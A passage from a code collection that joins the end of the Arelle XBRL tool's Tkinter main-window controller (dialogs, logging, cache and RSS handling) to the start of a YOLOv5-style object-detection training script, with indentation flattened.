modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.showTitle(filename=self.filename)
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=lambda: backgroundClearCache())
thread.daemon = True
thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def activeFormulaDialog(self, *args):
DialogActiveFormula.getActiveFormula(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} {1}bit {2}\n"
"An open source XBRL platform\n"
"\u00a9 2010-2015 Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2013 Python Software Foundation"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"\n xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
"\n xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
"{3}"
)
.format(self.__version__, self.systemWordSize, Version.version,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION))
# worker threads addToLog
def addToLog(self, message, messageCode="", messageArgs=None, file="", level=logging.INFO):
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
message = message % messageArgs
if self.testMode:
self.uiAddToLog(message)
else:
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads viewModelObject
def reloadTableView(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadTableView, [modelXbrl]))
# ui thread viewModelObject
def uiReloadTableView(self, modelXbrl):
for view in modelXbrl.views:
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
if self.testMode:
self.uiShowStatus(message, clearAfter)
else:
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None, initialfile=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent,
initialfile=initialfile)
if self.isMac:
return multFileNames
return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension,
File=initialfile)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent,
initialfile=initialfile)
def setTestMode(self, testMode):
self.testMode = testMode
def showMessage(self, message):
tkinter.messagebox.showwarning(_("arelle - Error"), message, parent=self.parent)
from arelle import (DialogFormulaParameters, DialogActiveFormula)
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
global restartMain, readCommandLineArguments
while restartMain:
restartMain = False
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelle"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
if readCommandLineArguments:
readCommandLineArguments = False
if len(sys.argv)>1:
fileName = sys.argv[1]
if os.path.isfile(fileName) and fileName.endswith('.xbrl') and os.access(fileName, os.R_OK) and os.access(fileName, os.W_OK):
cntlrWinMain.uiThreadQueue.put((cntlrWinMain.fileOpenFile, [fileName]))
application.mainloop()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import (
labels_to_class_weights,
increment_path,
labels_to_image_weights,
init_seeds,
fitness,
strip_optimizer,
get_latest_run,
check_dataset,
check_file,
check_git_status,
check_img_size,
check_requirements,
print_mutation,
set_logging,
one_cycle,
colorstr,
)
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import (
ModelEMA,
select_device,
intersect_dicts,
torch_distributed_zero_first,
is_parallel,
)
from utils.wandb_logging.wandb_utils import WandbLogger, resume_and_get_id
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None):
logger.info(
colorstr("hyperparameters: ") + ", ".join(f"{k}={v}" for k, v in hyp.items())
)
save_dir, epochs, batch_size, total_batch_size, weights, rank = (
Path(opt.save_dir),
opt.epochs,
opt.batch_size,
opt.total_batch_size,
opt.weights,
opt.global_rank,
)
# Directories
wdir = save_dir / "weights"
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / "last.pt"
best = wdir / "best.pt"
results_file = save_dir / "results.txt"
# Save run settings
with open(save_dir / "hyp.yaml", "w") as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / "opt.yaml", "w") as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != "cpu"
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
is_coco = opt.data.endswith("coco.yaml")
# Logging- Doing this before checking the dataset. Might update data_dict
loggers = {"wandb": None} # loggers dict
if rank in [-1, 0]:
opt.hyp = hyp # add hyperparameters
run_id = (
torch.load(weights).get("wandb_id")
if weights.endswith(".pt") and os.path.isfile(weights)
else None
)
wandb_logger = WandbLogger(opt, Path(opt.save_dir).stem, run_id, data_dict)
loggers["wandb"] = wandb_logger.wandb
data_dict = wandb_logger.data_dict
if wandb_logger.wandb:
weights, epochs, hyp = (
opt.weights,
opt.epochs,
opt.hyp,
) # WandbLogger might update weights, epochs if resuming
nc = 1 if opt.single_cls else int(data_dict["nc"]) # number of classes
names = (
["item"]
if opt.single_cls and len(data_dict["names"]) != 1
else data_dict["names"]
) # class names
assert len(names) == nc, "%g names found for nc=%g dataset in %s" % (
len(names),
nc,
opt.data,
) # check
# Model
pretrained = weights.endswith(".pt")
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(
opt.cfg or ckpt["model"].yaml, ch=3, nc=nc, anchors=hyp.get("anchors")
).to(
device
) # create
exclude = (
["anchor"] if (opt.cfg or hyp.get("anchors")) and not opt.resume else []
) # exclude keys
state_dict = ckpt["model"].float().state_dict() # to FP32
state_dict = intersect_dicts(
state_dict, model.state_dict(), exclude=exclude
) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info(
"Transferred %g/%g items from %s"
% (len(state_dict), len(model.state_dict()), weights)
) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get("anchors")).to(
device
) # create
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict["train"]
test_path = data_dict["val"]
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print("freezing %s" % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(
round(nbs / total_batch_size), 1
) # accumulate loss before optimizing
hyp["weight_decay"] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, "bias") and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, "weight") and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(
pg0, lr=hyp["lr0"], betas=(hyp["momentum"], 0.999)
) # adjust beta1 to momentum
else:
optimizer = optim.SGD(
pg0, lr=hyp["lr0"], momentum=hyp["momentum"], nesterov=True
)
optimizer.add_param_group(
{"params": pg1, "weight_decay": hyp["weight_decay"]}
) # add pg1 with weight_decay
optimizer.add_param_group({"params": pg2}) # add pg2 (biases)
logger.info(
"Optimizer groups: %g .bias, %g conv.weight, %g other"
% (len(pg2), len(pg1), len(pg0))
)
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = (
lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp["lrf"]) + hyp["lrf"]
) # linear
else:
lf = one_cycle(1, hyp["lrf"], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
# FIXME:
print("\n\n Not loading optimizer!!!!!")
# if pretrained:
# # Optimizer
# if ckpt["optimizer"] is not None:
# optimizer.load_state_dict(ckpt["optimizer"])
# best_fitness = ckpt["best_fitness"]
# # EMA
# if ema and ckpt.get("ema"):
# ema.ema.load_state_dict(ckpt["ema"].float().state_dict())
# ema.updates = ckpt["updates"]
# # Results
# if ckpt.get("training_results") is not None:
# results_file.write_text(ckpt["training_results"]) # write results.txt
# # Epochs
# start_epoch = ckpt["epoch"] + 1
# if opt.resume:
# assert (
# start_epoch > 0
# ), "%s training to %g epochs is finished, nothing to resume." % (
# weights,
# epochs,
# )
# if epochs < start_epoch:
# logger.info(
# "%s has been trained for %g epochs. Fine-tuning for %g additional epochs."
# % (weights, ckpt["epoch"], epochs)
# )
# epochs += ckpt["epoch"] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [
check_img_size(x, gs) for x in opt.img_size
] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info("Using SyncBatchNorm()")
# Trainloader
dataloader, dataset = create_dataloader(
train_path,
imgsz,
batch_size,
gs,
opt,
hyp=hyp,
augment=True,
cache=opt.cache_images,
rect=opt.rect,
rank=rank,
world_size=opt.world_size,
workers=opt.workers,
image_weights=opt.image_weights,
quad=opt.quad,
prefix=colorstr("train: "),
)
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert (
mlc < nc
), "Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g" % (
mlc,
nc,
opt.data,
nc - 1,
)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(
test_path,
imgsz_test,
batch_size * 2,
gs,
opt, # testloader
hyp=hyp,
cache=opt.cache_images and not opt.notest,
rect=True,
rank=-1,
world_size=opt.world_size,
workers=opt.workers,
pad=0.5,
prefix=colorstr("val: "),
)[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram("classes", c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp["anchor_t"], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank)
# Model parameters
hyp["box"] *= 3.0 / nl # scale to layers
hyp["cls"] *= nc / 80.0 * 3.0 / nl # scale to classes and layers
hyp["obj"] *= (imgsz / 640) ** 2 * 3.0 / nl # scale to image size and layers
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = (
labels_to_class_weights(dataset.labels, nc).to(device) * nc
) # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(
round(hyp["warmup_epochs"] * nb), 1000
) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(
f"Image sizes {imgsz} train, {imgsz_test} test\n"
f"Using {dataloader.num_workers} dataloader workers\n"
f"Logging results to {save_dir}\n"
f"Starting training for {epochs} epochs..."
)
for epoch in range(
start_epoch, epochs
): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = (
model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc
) # class weights
iw = labels_to_image_weights(
dataset.labels, nc=nc, class_weights=cw
) # image weights
dataset.indices = random.choices(
range(dataset.n), weights=iw, k=dataset.n
) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (
torch.tensor(dataset.indices)
if rank == 0
else torch.zeros(dataset.n)
).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(
("\n" + "%10s" * 8)
% ("Epoch", "gpu_mem", "box", "obj", "cls", "total", "labels", "img_size")
)
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (
imgs,
targets,
paths,
_,
) in (
pbar
): # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = (
imgs.to(device, non_blocking=True).float() / 255.0
) # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(
1, np.interp(ni, xi, [1, nbs / total_batch_size]).round()
)
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x["lr"] = np.interp(
ni,
xi,
[
hyp["warmup_bias_lr"] if j == 2 else 0.0,
x["initial_lr"] * lf(epoch),
],
)
if "momentum" in x:
x["momentum"] = np.interp(
ni, xi, [hyp["warmup_momentum"], hyp["momentum"]]
)
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [
math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]
] # new shape (stretched to gs-multiple)
imgs = F.interpolate(
imgs, size=ns, mode="bilinear", align_corners=False
)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(
pred, targets.to(device)
) # loss scaled by batch_size
if rank != -1:
loss *= (
opt.world_size
) # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.0
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = "%.3gG" % (
torch.cuda.memory_reserved() / 1e9
if torch.cuda.is_available()
else 0
) # (GB)
s = ("%10s" * 2 + "%10.4g" * 6) % (
"%g/%g" % (epoch, epochs - 1),
mem,
*mloss,
targets.shape[0],
imgs.shape[-1],
)
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f"train_batch{ni}.jpg" # filename
Thread(
target=plot_images, args=(imgs, targets, paths, f), daemon=True
).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(model, imgs) # add model to tensorboard
elif plots and ni == 10 and wandb_logger.wandb:
wandb_logger.log(
{
"Mosaics": [
wandb_logger.wandb.Image(str(x), caption=x.name)
for x in save_dir.glob("train*.jpg")
if x.exists()
]
}
)
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x["lr"] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(
model,
include=["yaml", "nc", "hyp", "gr", "names", "stride", "class_weights"],
)
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, times = test.test(
data_dict,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
